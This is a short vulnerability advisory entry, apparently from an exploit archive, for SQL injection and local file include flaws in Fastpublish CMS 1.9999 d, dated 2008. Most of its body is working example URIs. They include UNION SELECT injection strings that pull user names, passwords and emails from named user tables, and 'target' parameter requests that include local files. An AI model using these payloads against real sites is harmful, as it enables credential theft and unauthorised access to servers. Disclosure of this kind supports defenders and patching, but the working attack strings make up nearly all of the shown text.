exploits , vulnerabilities , articles , Fastpublish CMS Local File Include and SQL Injection Vulnerabilities

Title	Fastpublish CMS Local File Include and SQL Injection Vulnerabilities
Published	2008-10-05-12:00AM
Updated	2008-10-06-09:28PM
Class	Input Validation Error
CVE
Remote	Yes
Local	No
Credit	~!Dok_tOR!~
Vulnerable	Fastpublish Fashpublish CMS 1.9999 d
Not Vulnerable
Code	Attackers can exploit these issues via a browser.The following example URIs are available:http://www.example.com/[installdir]/index2.php?q=dok&sprache=-1'+union+select+1,2,3,4,5,concat_ws(0x3a,user_type,user_name,user_pw),7,8,9,10+from+fastpublish__forumen_userdata/* http://www.example.com/[installdir]/index2.php?q=dok&sprache=-1'+union+select+1,2,3,4,5,concat_ws(0x3a,user_type,user_name,user_pw),7,8,9,10+from+fastpublish__forum_de_userdata/* http://www.example.com/[installdir]/index2.php?q=dok&sprache=-1'+union+select+1,2,3,4,5,concat_ws(0x3a,benutzer,passwortm,email),7,8,9,10+from+fastpublish_benutzer/* http://www.example.com/[installdir]/index.php?artikel=-1+union+select+1,2,concat_ws(0x3a,user_type,user_name,user_pw),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+fastpublish__forumen_userdata/* http://www.example.com/index2.php?artikel=3&target=./[file] http://www.example.com/index.php?artikel=2&target=./[file]
TXT